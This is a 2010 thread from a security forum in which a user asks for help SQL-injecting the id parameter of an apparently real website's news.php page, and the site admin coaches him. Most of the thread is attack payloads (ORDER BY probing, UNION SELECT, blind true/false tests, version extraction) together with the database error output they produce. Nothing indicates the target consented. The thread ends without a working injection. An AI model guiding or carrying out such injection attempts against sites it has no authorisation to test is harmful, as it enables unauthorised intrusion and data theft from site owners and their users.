 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
SQL injection HELP!!!! w.. |
 |
 Posted: Wed Jun 16, 2010 11:48 am |
 |
|
| w0rm |
| Active user |
 |
|
| Joined: Feb 22, 2008 |
| Posts: 49 |
|
|
|
 |
|
 |
|
Hey, I'm stuck here, I m not abel to exploite this SQL vulnerability, please look at the error given.. & the query.
| Code: | | news.php?id=255 order by 25-- |
No error
| Code: | | news.php?id=255 order by 26-- |
A SQL error..
| Code: | 1054: Unknown column '26' in 'order clause'
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/mac/aes2010/Web/pages_en/news.php on line 11
News
1054: Unknown column '26' in 'order clause'
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/mac/aes2010/Web/pages_en/news.php on line 62 |
Emmm ok, so should I use UNION... look plz!
| Code: | | news.php?id=255 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- |
| Code: | | news.php?id=255 AND 1=1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- |
Uh also I got an error SQL..
| Code: | 1064: You have an error in your SQL syntax near 'UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--' at line 1
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/mac/aes2010/Web/pages_en/news.php on line 11
News
1064: You have an error in your SQL syntax near 'UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--' at line 1
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/mac/aes2010/Web/pages_en/news.php on line 62 |
So? Thank's In advanced.. |
|
|
|
|
|
|
|
|
| Posted: Wed Jun 16, 2010 2:45 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
It may be old 3.x MySql version, which does not support UNION.
You can use simple true/false tests for sql version verification:
| Code: |
news.php?id=255 AND ORD(SUBSTR(@@version,1,1))>50--
|
| Code: |
news.php?id=255 AND ORD(SUBSTR(@@version,1,1))>51--
|
| Code: |
news.php?id=255 AND ORD(SUBSTR(@@version,1,1))>52--
|
| Code: |
news.php?id=255 AND ORD(SUBSTR(@@version,1,1))>53--
|
|
|
|
|
|
|
|
|
|
| Posted: Wed Jun 16, 2010 4:29 pm |
|
|
| w0rm |
| Active user |
|
|
| Joined: Feb 22, 2008 |
| Posts: 49 |
|
|
|
|
|
|
|
| waraxe wrote: | It may be old 3.x MySql version, which does not support UNION.
You can use simple true/false tests for sql version verification:
| Code: |
news.php?id=255 AND ORD(SUBSTR(@@version,1,1))>50--
|
| Code: |
news.php?id=255 AND ORD(SUBSTR(@@version,1,1))>51--
|
| Code: |
news.php?id=255 AND ORD(SUBSTR(@@version,1,1))>52--
|
| Code: |
news.php?id=255 AND ORD(SUBSTR(@@version,1,1))>53--
|
|
Euh I got the same Error..
| Code: | 1064: You have an error in your SQL syntax near '(@@version,1,1))>53-- order by volgorde' at line 1
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/mac/aes2010/Web/pages_en/news.php on line 11
News
1064: You have an error in your SQL syntax near '(@@version,1,1))>53-- order by volgorde' at line 1
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/mac/aes2010/Web/pages_en/news.php on line 62 |
So? It seem hard.. |
|
|
|
|
|
|
|
|
| Posted: Wed Jun 16, 2010 4:43 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Try this tests:
| Code: |
news.php?id=255 AND 1=1--
|
| Code: |
news.php?id=255 AND 1=2--
|
|
|
|
|
|
|
|
|
|
| Posted: Wed Jun 16, 2010 4:45 pm |
|
|
| w0rm |
| Active user |
|
|
| Joined: Feb 22, 2008 |
| Posts: 49 |
|
|
|
|
|
|
|
| waraxe wrote: | Try this tests:
| Code: |
news.php?id=255 AND 1=1--
|
| Code: |
news.php?id=255 AND 1=2--
|
|
First > No error
Second > Error
| Code: | 1064: You have an error in your SQL syntax near 'order by volgorde' at line 1
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in |
news.php?id=255 UNION SELECT 1 AND 1=1--
news.php?id=255 UNION SELECT 1--
| Code: | 1064: You have an error in your SQL syntax near 'union select 1-- order by volgorde' at line 1
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in |
and A single quote in the variable..here
news.php?id=255' OR '1'='1'
| Code: | 1064: You have an error in your SQL syntax near '\' OR \'1\'=\'1\' order by volgorde' at line 1
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in |
So? |
|
|
|
|
|
|
|
|
| Posted: Wed Jun 16, 2010 9:20 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
OK, try this:
| Code: |
news.php?id=255 AND 1=1--
|
| Code: |
news.php?id=255 AND(SELECT 1)=1--
|
|
|
|
|
|
| Posted: Thu Jun 17, 2010 10:59 pm |
|
|
| w0rm |
| Active user |
|
|
| Joined: Feb 22, 2008 |
| Posts: 49 |
|
|
|
|
|
|
|
| waraxe wrote: | OK, try this:
| Code: |
news.php?id=255 AND(SELECT 1)=1--
|
|
The same error.. |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 70
Members: 0
Total: 70
